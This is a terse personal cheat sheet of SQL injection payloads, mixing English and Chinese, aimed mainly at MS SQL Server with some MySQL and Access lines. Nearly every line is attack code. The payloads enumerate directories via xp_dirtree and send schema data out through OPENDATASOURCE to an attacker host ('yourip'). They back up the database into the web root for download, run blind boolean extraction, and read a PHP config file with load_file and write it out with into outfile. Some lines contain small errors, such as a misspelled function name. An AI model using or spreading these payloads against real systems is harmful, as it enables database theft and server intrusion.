Some useful techniques in sql injection [个人总结简洁版]

1.a.  create table dirs (dir varchar(100),dirid int)
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
b.   set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
select 1+@dir
------or
alter table dirs add num int identity constraint num primary key
select  top  1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
c. create table tmptable ( name char(200),id int not null)
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
select *  into [tmpcolumns]from syscolumns where 1=2
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
declare　@a　sysname;　set　@a=db_name();backup　database　@a　to　disk='网站的绝对路径';--// 例如:e:/web/down.bak;--

2.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
select top 2 name,id from sysobjects where xtype='U'
select db_id('master')
select db_name(17)
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
select current_user,user,user_name(),system_user

DECLARE m  scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset
http://whois.webhosting.info
4.select case 1+1 when 1 then '1' else '0' end;
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
select if(STRCMP('net0r','netor1'),'not netor','is netor');
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'